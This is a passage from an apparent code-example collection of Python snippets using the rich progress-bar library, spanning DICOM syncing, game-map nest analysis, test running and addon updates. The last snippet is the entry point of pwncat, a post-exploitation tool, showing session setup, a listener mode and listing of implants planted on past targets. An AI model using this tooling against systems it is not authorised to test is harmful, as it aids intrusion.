    *([TextColumn("[bold salmon]Task: {task.description}")] + COLUMNS),
    transient=False,
)


def track(iterable, total=None, description="Working...", transient=False):
    """
        Spawns a progress bar to monitor the progress of a for loop over
        an iterable sequence with detailed information.

        Arguments:
            iterable: list or other iterable object
            total: int. Total length of iterable
Esempio n. 17
0
def sync(
    params,
    dests,
    source,
    query,
    query_res,
    since,
    before,
    edit,
    edit_json,
    trust_level,
    force_all,
    method,
    keep_errors,
    dry_run,
    local,
    dir_format,
    recurse,
    in_file_ext,
    out_file_ext,
    no_progress,
    no_report,
):
    """Sync DICOM data from a one or more sources to one or more destinations

    The `dests` can be a local directory, a DICOM network entity (given as
    'hostname:aetitle:port'), or a named remote/route from your config file.

    Generally you will need to use `--source` to specify the data source, unless
    you pass in a query result which contains a source (e.g. when doing
    'dcm query srcpacs ... | dcm sync destpacs'). The `--source` can be given
    in the same way `dests` are specified, except it cannot be a 'route'.
    """
    # Check for incompatible options
    # if validate and dry_run:
    #    cli_error("Can't do validation on a dry run!")

    # Disable progress for non-interactive output or dry runs
    if not sys.stdout.isatty() or dry_run:
        no_progress = True

    # Build query dataset if needed
    if len(query) != 0 or since is not None or before is not None:
        query = _build_query(query, since, before)
    else:
        query = None

    # Handle query-result options
    if query_res is None and not sys.stdin.isatty():
        query_res = sys.stdin
    if query_res is not None:
        in_str = query_res.read()
        if in_str:
            query_res = json_serializer.loads(in_str)
        else:
            query_res = None

    # Determine the local node being used
    try:
        local = params["config"].get_local_node(local)
    except NoLocalNodeError:
        local = None

    # Pass source options that override config through to the config parser
    local_dir_kwargs = {"make_missing": False}
    if recurse is not None:
        local_dir_kwargs["recurse"] = recurse
    if in_file_ext is not None:
        local_dir_kwargs["file_ext"] = in_file_ext
    params["config"].set_local_dir_kwargs(**local_dir_kwargs)
    params["config"].set_net_repo_kwargs(local=local)

    # Figure out source info
    if len(source) == 0:
        if query_res is None or query_res.prov.source is None:
            cli_error("No data source specified")
        if local is None:
            raise NoLocalNodeError("No local DICOM node configured")
        sources = [NetRepo(local, query_res.prov.source)]
    else:
        sources = []
        for s in source:
            try:
                sources.append(params["config"].get_bucket(s))
            except Exception as e:
                cli_error(f"Error processing source '{s}': {e}")

    # Pass dest options that override config through to the config parser
    local_dir_kwargs = {}
    if dir_format is not None:
        local_dir_kwargs["out_fmt"] = dir_format
    if out_file_ext is not None:
        local_dir_kwargs["file_ext"] = out_file_ext
    params["config"].set_local_dir_kwargs(**local_dir_kwargs)

    # Some command line options override route configuration
    static_route_kwargs = {}
    dynamic_route_kwargs = {}

    # Handle edit options
    filt = None
    if edit_json is not None:
        edit_dict = json.load(edit_json)
        edit_json.close()
    else:
        edit_dict = {}
    if edit:
        for edit_str in edit:
            attr, val = edit_str.split("=")
            edit_dict[attr] = val
    if edit_dict:
        filt = make_edit_filter(edit_dict)
        static_route_kwargs["filt"] = filt
        dynamic_route_kwargs["filt"] = filt

    # Convert dests/filters to a StaticRoute
    if method is not None:
        method = TransferMethod[method.upper()]
        static_route_kwargs["methods"] = (method, )
        dynamic_route_kwargs["methods"] = {None: (method, )}

    # Pass route options that override config through to the config parser
    params["config"].set_static_route_kwargs(**static_route_kwargs)
    params["config"].set_dynamic_route_kwargs(**dynamic_route_kwargs)

    # Do samity check that no sources are in dests. This is especially easy
    # mistake as earlier versions took the first positional arg to be the
    # source
    for dest in dests:
        try:
            d_bucket = params["config"].get_bucket(dest)
        except Exception:
            pass
        else:
            if any(s == d_bucket for s in sources):
                cli_error(f"The dest {dest} is also a source!")
            continue
        try:
            static_route = params["config"].get_static_route(dest)
        except Exception:
            pass
        else:
            for d in static_route.dests:
                if any(s == d_bucket for s in sources):
                    cli_error(f"The dest {d} is also a source!")
            continue
        try:
            sel_dest_map = params["config"].get_selector_dest_map(dest)
        except Exception:
            pass
        else:
            for _, s_dests in sel_dest_map.routing_map:
                for d in s_dests:
                    if any(s == d_bucket for s in sources):
                        cli_error(f"The dest {d} is also a source!")
            continue
        cli_error(f"Unknown dest: {dest}")

    # Convert dests to routes
    dests = params["config"].get_routes(dests)

    # Handle validate option
    # if validate:
    #    validators = [make_basic_validator()]
    # else:
    #    validators = None

    # Handle trust-level option
    trust_level = QueryLevel[trust_level.upper()]

    # Setup reporting/progress hooks and do the transfer
    with ExitStack() as estack:
        if not no_progress:
            prog_hook = RichProgressHook(
                estack.enter_context(
                    Progress(console=params["rich_con"], transient=True)))

        qr_reports = None
        if query is not None or query_res is not None:
            qr_reports = []
            for src in sources:
                if not no_progress:
                    report = MultiListReport(description="init-query",
                                             prog_hook=prog_hook)
                else:
                    report = None
                qr_reports.append(report)

        if query_res is None:
            qrs = None
        else:
            qrs = [deepcopy(query_res) for _ in sources]

        base_kwargs = {
            "trust_level": trust_level,
            "force_all": force_all,
            "keep_errors": keep_errors,
            #'validators': validators,
        }
        sm_kwargs = []
        sync_reports = []
        for src in sources:
            if not no_progress:
                sync_report = SyncReport(prog_hook=prog_hook)
            else:
                sync_report = SyncReport()
            kwargs = deepcopy(base_kwargs)
            kwargs["report"] = sync_report
            sm_kwargs.append(kwargs)
            sync_reports.append(sync_report)

        asyncio.run(
            sync_data(sources, dests, query, qrs, qr_reports, sm_kwargs,
                      dry_run))

    for report in sync_reports:
        report.log_issues()
        if not no_report:
            click.echo(report)
            click.echo("\n")
Esempio n. 18
0
def analyze_nests(config, area, nest_mons, queries, reset_time, nodelete):
    OSM_DATE = osm_date()
    # Getting OSM/overpass data
    
    osm_file_name = f"data/osm_data/{area.name} {OSM_DATE.replace(':', '')}.json"
    try:
        with open(osm_file_name, mode="r", encoding="utf-8") as osm_file:
            nest_json = json.load(osm_file)
    except:
        nest_json = get_osm_data(area.bbox, OSM_DATE, osm_file_name)

    # Getting area data

    area_file_name = f"data/area_data/{area.name}.json"
    area_file_data = {}
    try:
        with open(area_file_name, mode="r", encoding="utf-8") as area_file:
            log.info("Found area data file. Reading and using data from it now")
            area_file_data_raw = json.load(area_file)
        for k, v in area_file_data_raw.items():
            area_file_data[int(k)] = v

    except FileNotFoundError:
        pass

    """db_file_name = f"data/db_data/{area.name}.json"
    try:
        with open(db_file_name, mode="r", encoding="utf-8") as db_file:
            db_data = json.load(db_file)
    except FileNotFoundError:
        db_data = {}"""
    
    if not nodelete:
        queries.nest_delete(area.sql_fence)

    log.info(f"Got all relevant information. Searching for nests in {area.name} now")

    nodes = {}
    ways = []
    relations = []
    for element in nest_json['elements']:
        if not "type" in element:
            continue
        if element["type"] == "node":
            nodes[element["id"]] = {
                "lat": element["lat"],
                "lon": element["lon"]
            }
        elif element["type"] == "way":
            if "nodes" not in element and not element["nodes"]:
                continue
            ways.append(WayPark(element, config))
        elif element["type"] == "relation":
            if "members" not in element and not element["members"]:
                continue
            relations.append(RelPark(element, config))

    parks = ways + relations

    # Check Relations

    failed_nests = defaultdict(int)
    failed_nests["Total Nests found"] = 0
    double_ways = []

    start = timeit.default_timer()

    if config.less_queries:
        log.info("Getting DB data")
        all_spawns = [(str(_id), geometry.Point(lon, lat)) for _id, lat, lon in queries.spawns(area.sql_fence)]
        all_mons = queries.all_mons(str(tuple(nest_mons)), str(reset_time), area.sql_fence)
        all_mons = [(_id, geometry.Point(lon, lat)) for _id, lat, lon in all_mons]
    
    with Progress() as progress:
        #check_rels_task = progress.add_task("Generating Polygons", total=len(parks))
        for park in relations:
            double_ways = park.get_polygon(nodes, ways, double_ways)
            #progress.update(check_rels_task, advance=1)
        for park in ways:
            park.get_polygon(nodes)
            #progress.update(check_rels_task, advance=1)

        for osm_id, data in area_file_data.items():
            for connect_id in data["connect"]:
                for i, park in enumerate(parks):
                    if park.id == osm_id:
                        big_park = park
                        big_park_i = i
                    if park.id == connect_id:
                        small_park = park
                        small_park_i = i

                parks[big_park_i].connect.append(connect_id)
                parks[big_park_i].polygon = cascaded_union([big_park.polygon, small_park.polygon])
                parks.pop(small_park_i)

        # NOW CHECK ALL AREAS ONE AFTER ANOTHER
        check_nest_task = progress.add_task("Nests found: 0", total=len(parks))
        nests = []

        for park in parks:
            progress.update(check_nest_task, advance=1, description=f"Nests found: {failed_nests['Total Nests found']}")

            if not park.is_valid:
                failed_nests["Geometry is not valid"] += 1
                continue

            if not area.polygon.contains(park.polygon):
                failed_nests["Not in Geofence"] += 1
                continue

            if park.id in double_ways:
                failed_nests["Avoiding double nests"] += 1
                continue

            pokestop_in = None
            stops = []
            if config.scanner == "rdm" and config.pokestop_pokemon:
                # Get all Pokestops with id, lat and lon
                for pkstp in queries.stops(park.sql_fence):
                    stops.append(str(pkstp[0]))
                pokestop_in = "'{}'".format("','".join(stops))

            if config.less_queries:
                spawns = [s[0] for s in all_spawns if park.polygon.contains(s[1])]
            else:
                spawns = [str(s[0]) for s in queries.spawns(park.sql_fence)]

            if not stops and not spawns:
                failed_nests["No Stops or Spawnpoints"] += 1
                continue
            if (len(stops) < 1) and (len(spawns) < area.settings['min_spawnpoints']):
                failed_nests["Not enough Spawnpoints"] += 1
                continue
            spawnpoint_in = "'{}'".format("','".join(spawns))
            if spawnpoint_in == "''": spawnpoint_in = "NULL" # This will handle the SQL warning since a blank string shouldn't be used for a number

            if config.less_queries:
                mons = [s[0] for s in all_mons if park.polygon.contains(s[1])]
                if len(mons) == 0:
                    failed_nests["No Pokemon"] += 1
                    continue
                most_id = max(set(mons), key=mons.count)
                poke_data = [most_id, mons.count(most_id)]

            else:
                poke_data = queries.mons(spawnpoint_in, str(tuple(nest_mons)), str(reset_time), pokestop_in)

                if poke_data is None:
                    failed_nests["No Pokemon"] += 1
                    continue
            park.mon_data(poke_data[0], poke_data[1], area.settings['scan_hours_per_day'], len(spawns) + len(stops))

            if park.mon_count < area.settings['min_pokemon']:
                failed_nests["Not enough Pokemon"] += 1
                continue
            if park.mon_avg < area.settings['min_average']:
                failed_nests["Average spawnrate too low"] += 1
                continue
            if park.mon_ratio < area.settings['min_ratio']:
                failed_nests["Average spawn ratio too low"] += 1
                continue

            try:
                park.generate_details(area_file_data, failed_nests["Total Nests found"])
            except TopologicalError:
                failed_nests["Geometry is not valid"] += 1

            # Insert Nest data to db
            insert_args = {
                "nest_id": park.id,
                "name": park.name,
                "form": park.mon_form,
                "lat": park.lat,
                "lon": park.lon,
                "pokemon_id": park.mon_id,
                "type": 0,
                "pokemon_count": park.mon_count,
                "pokemon_avg": park.mon_avg,
                "pokemon_ratio": park.mon_ratio,
                "poly_path": json.dumps(park.path),
                "poly_type": 1 if isinstance(park, RelPark) else 0,
                "current_time": int(time.time())
            }

            failed_nests["Total Nests found"] += 1
            nests.append(park)

            queries.nest_insert(insert_args)
    stop = timeit.default_timer()
    log.success(f"Done finding nests in {area.name} ({round(stop - start, 1)} seconds)")
    for k, v in failed_nests.items():
        log.info(f" - {k}: {v}")

    def sort_avg(nest):
        return nest.mon_avg

    new_area_data = {}
    for nest in sorted(nests, key=sort_avg, reverse=True):
        new_area_data[nest.id] = {
            "name": nest.name,
            "center": [nest.lat, nest.lon],
            "connect": nest.connect
        }
    for oid, data in area_file_data.items():
        if oid not in [n.id for n in nests]:
            new_area_data[oid] = {
                "name": data["name"],
                "center": data["center"],
                "connect": data["connect"]
            }
    with open(area_file_name, mode="w+") as area_file:
        area_file.write(json.dumps(new_area_data, indent=4))

        log.info("Saved area data")
    log.success(f"All done with {area.name}\n")

    return nests
Esempio n. 19
0
from rich.progress import (
    BarColumn,
    DownloadColumn,
    TextColumn,
    TransferSpeedColumn,
    TimeRemainingColumn,
    Progress,
    TaskID,
)

progress = Progress(
    TextColumn("[bold blue]{task.fields[filename]}", justify="right"),
    BarColumn(bar_width=None),
    "[progress.percentage]{task.percentage:>3.1f}%",
    "•",
    DownloadColumn(),
    "•",
    TransferSpeedColumn(),
    "•",
    TimeRemainingColumn(),
)


def copy_url(task_id: TaskID, url: str, path: str) -> None:
    """Copy data from a url to a local file."""
    response = urlopen(url)
    # This will break if the response doesn't contain content length
    progress.update(task_id, total=int(response.info()["Content-length"]))
    with open(path, "wb") as dest_file:
        progress.start_task(task_id)
        for data in iter(partial(response.read, 32768), b""):
Esempio n. 20
0
    """Make a new table."""
    table = Table()
    table.add_column("ID")
    table.add_column("Value")
    table.add_column("Status")

    for row in range(random.randint(2, 6)):
        value = random.random() * 100
        table.add_row(f"{row}", f"{value:3.2f}",
                      "[red]ERROR" if value < 50 else "[green]SUCCESS")
    return table


print('before')

with Progress(transient=True) as progress:

    task1 = progress.add_task("[red]Downloading...", total=1000)
    task2 = progress.add_task("[green]Processing...", total=1000)
    task3 = progress.add_task("[cyan]Cooking...", total=1000)

    while not progress.finished:
        progress.update(task1, advance=5)
        progress.update(task2, advance=3)
        progress.update(task3, advance=9)
        time.sleep(0.02)
with Live(generate_table(), refresh_per_second=4, transient=True) as live:
    with Live(generate_table(), refresh_per_second=4, transient=True) as live2:
        for _ in range(10):
            time.sleep(0.4)
            live.update(generate_table())
Esempio n. 21
0
def test_progress_create() -> None:
    progress = Progress()
    assert progress.finished
    assert progress.tasks == []
    assert progress.task_ids == []
Esempio n. 22
0
 def c_update(self, args, addline=False, update=True, force=False):
     if len(self.core.cfCache) > 0 or len(self.core.wowiCache) > 0:
         self.core.cfCache = {}
         self.core.wowiCache = {}
         self.core.checksumCache = {}
     if args:
         addons = [
             addon.strip()
             for addon in list(reader([args], skipinitialspace=True))[0]
         ]
     else:
         addons = sorted(self.core.config['Addons'],
                         key=lambda k: k['Name'].lower())
     exceptions = []
     with Progress(
             '{task.completed:.0f}/{task.total}',
             '|',
             BarColumn(bar_width=self.console.width + 1),
             '|',
             auto_refresh=False,
             console=None if self.headless else self.console) as progress:
         task = progress.add_task('', total=len(addons))
         if not args:
             self.core.bulk_check(addons)
             self.core.bulk_check_checksum(addons, progress)
         while not progress.finished:
             for addon in addons:
                 try:
                     name, versionnew, versionold, modified = self.core.\
                         update_addon(addon if isinstance(addon, str) else addon['URL'], update, force)
                     if versionold:
                         if versionold == versionnew:
                             if modified:
                                 self.table.add_row(
                                     '[bold red]Modified[/bold red]', name,
                                     versionold)
                             else:
                                 self.table.add_row(
                                     '[green]Up-to-date[/green]', name,
                                     versionold)
                         else:
                             if modified:
                                 self.table.add_row(
                                     '[bold red]Update suppressed[/bold red]',
                                     name, versionold)
                             else:
                                 self.table.add_row(
                                     f'[yellow]{"Updated " if update else "Update available"}'
                                     f'[/yellow]', name,
                                     f'[yellow]{versionnew}[/yellow]')
                     else:
                         self.table.add_row(
                             f'[bold black]Not installed[/bold black]',
                             addon, '')
                 except Exception as e:
                     exceptions.append(e)
                 progress.update(task,
                                 advance=1 if args else 0.5,
                                 refresh=True)
     if addline:
         self.console.print('\n')
     self.console.print(self.table)
     if len(addons) == 0:
         self.console.print(
             'Apparently there are no addons installed by CurseBreaker.\n'
             'Command [green]import[/green] might be used to detect already installed addons.'
         )
     if len(exceptions) > 0:
         self.handle_exception(exceptions, False)
Esempio n. 23
0
def run_tests(
    tests: List[str],
    sequential: bool = typer.Option(
        False,
        '--sequential',
        '-s',
        help='Run all test of each group in order'),
    workers: int = typer.Option(1,
                                '--workers',
                                '-p',
                                help='Number of parallel tasks'),
    iterations: int = typer.Option(10,
                                   '--iter',
                                   '-n',
                                   help='Number of iterations to run'),
    output: Optional[Path] = typer.Option(None,
                                          '--output',
                                          '-o',
                                          help='Output path to use'),
    verbose: bool = typer.Option(False,
                                 '--verbose',
                                 '-v',
                                 help='Verbosity level'),
    archive: bool = typer.Option(
        False,
        '--archive',
        '-a',
        help='Save all logs intead of only failed ones'),
    race: bool = typer.Option(False,
                              '--race/--no-race',
                              '-r/-R',
                              help='Run with race checker'),
    loop: bool = typer.Option(False, '--loop', '-l', help='Run continuously'),
    growth: int = typer.Option(
        10,
        '--growth',
        '-g',
        help='Growth ratio of iterations when using --loop'),
    timing: bool = typer.Option(False,
                                '--timing',
                                '-t',
                                help='Report timing, only works on macOS'),
    # fmt: on
):
    print(tests)
    if output is None:
        timestamp = datetime.datetime.now().strftime("%Y%m%d_%H%M%S")
        output = Path(timestamp)

    if race:
        print("[yellow]Running with the race detector\n[/yellow]")

    if verbose:
        print(f"[yellow]Verbosity level set to 1 [/yellow]")
        os.environ['DEBUG'] = '1'

    while True:

        total = iterations * len(tests)
        completed = 0

        results = {test: defaultdict(StatsMeter) for test in tests}

        if sequential:
            test_instances = itertools.chain.from_iterable(
                itertools.repeat(test, iterations) for test in tests)
        else:
            test_instances = itertools.chain.from_iterable(
                itertools.repeat(tests, iterations))
        test_instances = iter(test_instances)

        total_progress = Progress(
            "[progress.description]{task.description}",
            BarColumn(),
            TimeRemainingColumn(),
            "[progress.percentage]{task.percentage:>3.0f}%",
            TimeElapsedColumn(),
        )
        total_task = total_progress.add_task("[yellow]Tests[/yellow]",
                                             total=total)

        task_progress = Progress(
            "[progress.description]{task.description}",
            SpinnerColumn(),
            BarColumn(),
            "{task.completed}/{task.total}",
        )
        tasks = {
            test: task_progress.add_task(test, total=iterations)
            for test in tests
        }

        progress_table = Table.grid()
        progress_table.add_row(total_progress)
        progress_table.add_row(Panel.fit(task_progress))

        with Live(progress_table, transient=True) as live:

            def handler(_, frame):
                live.stop()
                print('\n')
                print_results(results)
                sys.exit(1)

            signal.signal(signal.SIGINT, handler)

            with ThreadPoolExecutor(max_workers=workers) as executor:

                futures = []
                while completed < total:
                    n = len(futures)
                    if n < workers:
                        for test in itertools.islice(test_instances,
                                                     workers - n):
                            futures.append(
                                executor.submit(run_test, test, race, timing))

                    done, not_done = wait(futures, return_when=FIRST_COMPLETED)

                    for future in done:
                        test, path, rc, runtime = future.result()

                        results[test]['completed'].add(1)
                        results[test]['time'].add(runtime)
                        task_progress.update(tasks[test], advance=1)
                        dest = (output / f"{test}_{completed}.log").as_posix()
                        if rc != 0:
                            print(f"Failed test {test} - {dest}")
                            task_progress.update(
                                tasks[test], description=f"[red]{test}[/red]")
                            results[test]['failed'].add(1)
                        else:
                            if results[test][
                                    'completed'].n == iterations and results[
                                        test]['failed'].n == 0:
                                task_progress.update(
                                    tasks[test],
                                    description=f"[green]{test}[/green]")

                        if rc != 0 or archive:
                            output.mkdir(exist_ok=True, parents=True)
                            shutil.copy(path, dest)

                        if timing:
                            line = last_line(path)
                            real, _, user, _, system, _ = line.replace(
                                ' ' * 8, '').split(' ')
                            results[test]['real_time'].add(float(real))
                            results[test]['user_time'].add(float(user))
                            results[test]['system_time'].add(float(system))

                        os.remove(path)

                        completed += 1
                        total_progress.update(total_task, advance=1)

                        futures = list(not_done)

        print_results(results, timing)

        if loop:
            iterations *= growth
            print(f"[yellow]Increasing iterations to {iterations}[/yellow]")
        else:
            break
Esempio n. 24
0
class TrafficProgress:
    def __init__(
        self,
        numRepos: int,
        follower: int = 0,
        following: int = 0,
        numStat: int = 5,
    ) -> None:

        self.numStat = numStat
        self.numRepos = numRepos
        self._profileText = Text(
            f"{follower:03d} Follower\n{following:03d} Following\n{numRepos:03d} Public Repositories"
        )

        self.progressTable = Table.grid(expand=True)
        self.progressTotal = Progress(
            "{task.description}",
            SpinnerColumn(),
            BarColumn(),
            TextColumn("[progress.percentage]{task.percentage:>3.0f}%"),
        )

        self.progressTable.add_row(
            Panel(
                Align.center(Text(
                    """Placeholder""",
                    justify="center",
                )),
                title="[b]Info",
                border_style="red",
                padding=(1, 1),
            ),
            Panel(
                Align.center(self._profileText),
                title="[b]Profile Info",
                border_style="yellow",
                padding=(1, 1),
            ),
            Panel(
                self.progressTotal,  # type:ignore
                title="[b]Total Progress",
                border_style="green",
                padding=(1, 2),
            ),
        )

        self.taskTotal = self.progressTotal.add_task(description="Progress",
                                                     total=numStat * numRepos)
        self.taskRepo = self.progressTotal.add_task(
            description="Repository [bold yellow]#", total=numRepos)
        self.taskStat = self.progressTotal.add_task(
            description="Stat [bold violet]#", total=numStat)

    def UpdateRepoDescription(self, repo: str):
        self.progressTotal.update(
            self.taskRepo, description=f"Repository [bold yellow]#{repo}")

    def UpdateStatDescription(self, stat: str):
        self.progressTotal.update(self.taskStat,
                                  description=f"Stat [bold violet]#{stat}")

    def StepTotal(self):
        self.progressTotal.advance(self.taskTotal)

    def StepRepo(self):
        self.progressTotal.advance(self.taskRepo)

    def StepStat(self):
        self.progressTotal.advance(self.taskStat)

    def ResetStatProgress(self):
        self.progressTotal.reset(self.taskStat)

    def CompleteStat(self):
        self.progressTotal.reset(
            self.taskStat,
            description="Stat [bold violet]#Completed",
            completed=self.numStat,
        )
class DisplayManager:
    def __init__(self):

        # ! Change color system if "legacy" windows terminal to prevent wrong colors displaying
        self.is_legacy = detect_legacy_windows()

        # ! dumb_terminals automatically handled by rich. Color system is too but it is incorrect
        # ! for legacy windows ... so no color for y'all.
        self.console = Console(
            theme=custom_theme,
            color_system="truecolor" if not self.is_legacy else None)

        self._rich_progress_bar = Progress(
            SizedTextColumn(
                "[white]{task.description}",
                overflow="ellipsis",
                width=int(self.console.width / 3),
            ),
            SizedTextColumn("{task.fields[message]}",
                            width=18,
                            style="nonimportant"),
            BarColumn(bar_width=None, finished_style="green"),
            "[progress.percentage]{task.percentage:>3.0f}%",
            TimeRemainingColumn(),
            console=self.console,
            # ! Normally when you exit the progress context manager (or call stop())
            # ! the last refreshed display remains in the terminal with the cursor on
            # ! the following line. You can also make the progress display disappear on
            # ! exit by setting transient=True on the Progress constructor
            transient=self.is_legacy,
        )

        self.song_count = 0
        self.overall_task_id = None
        self.overall_progress = 0
        self.overall_total = 100
        self.overall_completed_tasks = 0
        self.quiet = False

        # ! Basically a wrapper for rich's: with ... as ...
        self._rich_progress_bar.__enter__()

    def print(self, *text, color="green"):
        """
        `text` : `any`  Text to be printed to screen
        Use this self.print to replace default print().
        """

        if self.quiet:
            return

        line = " ".join(str(item) for item in text)
        if color:
            self._rich_progress_bar.console.print(f"[{color}]{line}")
        else:
            self._rich_progress_bar.console.print(line)

    def set_song_count_to(self, song_count: int) -> None:
        """
        `int` `song_count` : number of songs being downloaded
        RETURNS `~`
        sets the size of the progressbar based on the number of songs in the current
        download set
        """

        # ! all calculations are based of the arbitrary choice that 1 song consists of
        # ! 100 steps/points/iterations
        self.song_count = song_count

        self.overall_total = 100 * song_count

        if self.song_count > 4:
            self.overall_task_id = self._rich_progress_bar.add_task(
                description="Total",
                process_id="0",
                message=
                f"{self.overall_completed_tasks}/{int(self.overall_total / 100)} complete",
                total=self.overall_total,
                visible=(not self.quiet),
            )

    def update_overall(self):
        """
        Updates the overall progress bar.
        """

        # If the overall progress bar exists
        if self.overall_task_id is not None:
            self._rich_progress_bar.update(
                self.overall_task_id,
                message=
                f"{self.overall_completed_tasks}/{int(self.overall_total / 100)} complete",
                completed=self.overall_progress,
            )

    def new_progress_tracker(self, songObj):
        """
        returns new instance of `_ProgressTracker` that follows the `songObj` download subprocess
        """
        return _ProgressTracker(self, songObj)

    def close(self) -> None:
        """
        clean up rich
        """

        self._rich_progress_bar.stop()
Esempio n. 26
0
def run(check_target, output, out_format, query, version):
    """Run checks against CHECK_TARGET.

    \b
    CHECK_TARGET can be:
      rpm file
      directory containing rpm files
      "system" to check locally installed kernel modules
      a config file listing remote systems to check (Please
      ensure your remote systems are scp command accessable)

      default is local system
    """

    if version:
        print(__VERSION__)
        exit()

    FORMAT = "%(asctime)-15s %(message)s"
    logging.basicConfig(format=FORMAT, handlers=[RichHandler()])
    logger = logging.getLogger("rich")
    logger.setLevel(logging.INFO)

    target = Check_Target(check_target)

    query = query.lower()

    dst = Path(output)
    if dst.is_dir() or output.endswith("/"):
        dst = dst / "check_result"

    if not dst_is_ok(dst, out_format):
        logger.error("Can't write to output")
        exit(1)

    # try to guess format from file extension
    if out_format is None:
        ext_to_format = {v: k for k, v in FORMAT_TYPES.items()}
        out_format = ext_to_format.get(dst.suffix, None)

    if target.rpm:
        progress = Progress(
            "{task.description}",
            SpinnerColumn(),
            BarColumn(),
            TextColumn("[progress.percentage]{task.percentage:>3.0f}%"),
        )
        with progress:
            rpmCheck = data_reader.RPMReader(progress)
            check_result = rpmCheck.get_rpm_info(target.rpm)

    elif target.dir:
        progress = Progress(
            "{task.description}",
            SpinnerColumn(),
            BarColumn(),
            TextColumn("[progress.percentage]{task.percentage:>3.0f}%"),
        )
        with progress:
            rpmCheck = data_reader.RPMReader(progress)
            check_result = rpmCheck.get_rpms_info(path=target.dir, query=query)
        exporter = data_exporter.RPMsExporter()
        export(exporter, check_result, out_format, dst)
        logger.info(
            "[green]Check is completed![/]"
            "The result has been saved to "
            "[bold green]%s[/]" % dst,
            extra={"markup": True},
        )

    elif target.system:
        try:
            hostname = socket.gethostname()
            ip = socket.gethostbyname(hostname)
        except socket.gaierror as e:
            logger.warning(f"Get ip by hostname: {hostname} failed: {e}")
        finally:
            ip = "127.0.0.1"
        label = "%s (%s)" % (hostname, ip)
        logger.info("Retrieving kernel module data for %s" % label)
        progress = Progress(
            "{task.description}",
            SpinnerColumn(),
            BarColumn(),
            TextColumn("[progress.percentage]{task.percentage:>3.0f}%"),
        )
        with progress:
            driverCheck = data_reader.DriverReader(progress)
            drivers, wu_drivers, noinfo_drivers = driverCheck.get_local_drivers(
                query)
            check_result = {
                label: {
                    "drivers": drivers,
                    "weak-update-drivers": wu_drivers,
                    "noinfo-drivers": noinfo_drivers,
                }
            }
        exporter = data_exporter.DriversExporter()
        export(exporter, check_result, out_format, dst)
        progress.console.print("[green]Check is completed![/]"
                               "The result has been saved to "
                               "[bold green]%s[/]" % dst)

    elif target.config is not None:
        servers = target.config["servers"]
        check_result = remote_check.check_remote_servers(logger, servers)
        exporter = data_exporter.DriversExporter()
        export(exporter, check_result, out_format, dst)
        logger.info(
            "[green]Check is completed[/]"
            "Please see the results in [bold green]%s[/]" % dst.parent,
            extra={"markup": True},
        )
Esempio n. 27
0
from models import Order
from models import Order_Detail
from models import Product
from rich.progress import Progress
from sqldb import sqldb

data = []

with open("Datasets/orders.csv", encoding="utf-8") as file:
    reader = csv.DictReader(file)
    data = list(reader)

data = [dict(i) for i in data]

with Progress() as progress:
    products = {i["Lineitem sku"]: i["Lineitem name"] for i in data}
    task1 = progress.add_task("[cyan]Adding orders..", total=len(data))
    task2 = progress.add_task("[green]Adding products..", total=len(products))
    temp = {}

    for row in data:
        if row["Financial Status"] == "paid":
            if temp:
                order = Order(temp)
                sqldb.add_order(order)
                for detail in order.details:
                    if detail.product_sku.isnumeric():
                        sqldb.add_order_details(detail)
                        print(detail.order_id)
                        time.sleep(0.02)
Esempio n. 28
0
def main():

    # Default log-level is "INFO"
    logging.getLogger().setLevel(logging.INFO)

    parser = argparse.ArgumentParser(
        description=
        """Start interactive pwncat session and optionally connect to existing victim via a known platform and channel type. This entrypoint can also be used to list known implants on previous targets."""
    )
    parser.add_argument("--version",
                        "-v",
                        action="store_true",
                        help="Show version number and exit")
    parser.add_argument(
        "--download-plugins",
        action="store_true",
        help="Pre-download all Windows builtin plugins and exit immediately",
    )
    parser.add_argument(
        "--config",
        "-c",
        type=argparse.FileType("r"),
        default=None,
        help="Custom configuration file (default: ./pwncatrc)",
    )
    parser.add_argument(
        "--identity",
        "-i",
        type=argparse.FileType("r"),
        default=None,
        help="Private key for SSH authentication",
    )
    parser.add_argument(
        "--listen",
        "-l",
        action="store_true",
        help="Enable the `bind` protocol (supports netcat-style syntax)",
    )
    parser.add_argument(
        "--platform",
        "-m",
        help="Name of the platform to use (default: linux)",
        default="linux",
    )
    parser.add_argument(
        "--port",
        "-p",
        help="Alternative way to specify port to support netcat-style syntax",
    )
    parser.add_argument(
        "--list",
        action="store_true",
        help="List installed implants with remote connection capability",
    )
    parser.add_argument(
        "connection_string",
        metavar="[protocol://][user[:password]@][host][:port]",
        help="Connection string describing victim",
        nargs="?",
    )
    parser.add_argument(
        "pos_port",
        nargs="?",
        metavar="port",
        help="Alternative port number to support netcat-style syntax",
    )
    args = parser.parse_args()

    # Print the version number and exit.
    if args.version:
        print(importlib.metadata.version("pwncat"))
        return

    # Create the session manager
    with pwncat.manager.Manager(args.config) as manager:

        if args.download_plugins:
            for plugin_info in pwncat.platform.Windows.PLUGIN_INFO:
                with pwncat.platform.Windows.open_plugin(
                        manager, plugin_info.provides[0]):
                    pass

            return

        if args.list:

            db = manager.db.open()
            implants = []

            table = Table(
                "ID",
                "Address",
                "Platform",
                "Implant",
                "User",
                box=box.MINIMAL_DOUBLE_HEAD,
            )

            # Locate all installed implants
            for target in db.root.targets:

                # Collect users
                users = {}
                for fact in target.facts:
                    if "user" in fact.types:
                        users[fact.id] = fact

                # Collect implants
                for fact in target.facts:
                    if "implant.remote" in fact.types:
                        table.add_row(
                            target.guid,
                            target.public_address[0],
                            target.platform,
                            fact.source,
                            users[fact.uid].name,
                        )

            if not table.rows:
                console.log("[red]error[/red]: no remote implants found")
            else:
                console.print(table)

            return

        console.log("Welcome to [red]pwncat[/red] 🐈!")

        if (args.connection_string is not None or args.pos_port is not None
                or args.port is not None or args.listen
                or args.identity is not None):
            protocol = None
            user = None
            password = None
            host = None
            port = None

            if args.connection_string:
                m = connect.Command.CONNECTION_PATTERN.match(
                    args.connection_string)
                protocol = m.group("protocol")
                user = m.group("user")
                password = m.group("password")
                host = m.group("host")
                port = m.group("port")

            if protocol is not None:
                protocol = protocol.removesuffix("://")

            if host is not None and host == "":
                host = None

            if protocol is not None and args.listen:
                console.log(
                    "[red]error[/red]: --listen is not compatible with an explicit connection string"
                )
                return

            if (sum([
                    port is not None,
                    args.port is not None,
                    args.pos_port is not None,
            ]) > 1):
                console.log("[red]error[/red]: multiple ports specified")
                return

            if args.port is not None:
                port = args.port
            if args.pos_port is not None:
                port = args.pos_port

            if port is not None:
                try:
                    port = int(port.lstrip(":"))
                except ValueError:
                    console.log(
                        f"[red]error[/red]: {port}: invalid port number")
                    return

            # Attempt to reconnect via installed implants
